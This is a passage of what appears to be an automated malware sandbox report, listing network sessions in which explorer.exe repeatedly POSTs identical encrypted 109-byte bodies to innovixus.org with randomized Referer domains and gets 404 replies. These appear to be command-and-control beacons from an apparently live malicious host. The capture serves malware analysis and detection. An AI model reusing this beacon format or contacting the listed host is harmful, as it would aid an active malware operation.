                                                                                                                                                              Nov 6, 2024 17:35:23.800704002 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:25.168999910 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:25 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              20192.168.11.2049774150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:25.371047020 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://ghsxueypspuw.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:25.371047020 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:25.627413034 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:25 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              21192.168.11.2049775150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:25.828094006 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://dxcstthegjtyiuv.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:25.828094006 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:26.085067987 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:25 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              22192.168.11.2049776150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:26.285476923 CET278OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://jegntitrwah.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:26.285521984 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:26.543991089 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:26 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              23192.168.11.2049777150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:26.742991924 CET278OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://fflfeclqdvs.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:26.742991924 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:26.999397993 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:26 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              24192.168.11.2049778150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:27.207703114 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://dqgpuokjonbaxi.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:27.207703114 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:27.464862108 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:27 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              25192.168.11.2049779150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:27.667258024 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://lseeiaoqpwqavr.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:27.667258978 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:27.927138090 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:27 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              26192.168.11.2049780150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:28.126244068 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://aijvngmrwrpbae.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:28.126244068 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:28.384356022 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:28 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              27192.168.11.2049781150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:28.585449934 CET280OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://aahwanpjvkrdt.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:28.585449934 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:28.838175058 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:28 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              28192.168.11.2049782150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:29.042788029 CET280OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://vocyfosbdidhx.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:29.042788029 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:29.298784018 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:29 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              29192.168.11.2049783150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:29.499098063 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://kybgadnxuheufnw.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:29.499098063 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:29.754291058 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:29 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              30192.168.11.2049784150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:29.956779957 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://hehgxpqemmxhtl.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:29.956779957 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:30.211818933 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:30 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              31192.168.11.2049785150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:30.410573006 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://ljfejfsbbbqwrlh.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:30.410631895 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:30.667898893 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:30 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              32192.168.11.2049786150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:30.866842031 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://ayqexcuflcavkdwn.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:30.866842031 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:31.123867989 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:31 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              33192.168.11.2049787150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:31.324265003 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://qjroeqtdxjfutnwx.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:31.324265003 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:31.584651947 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:31 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
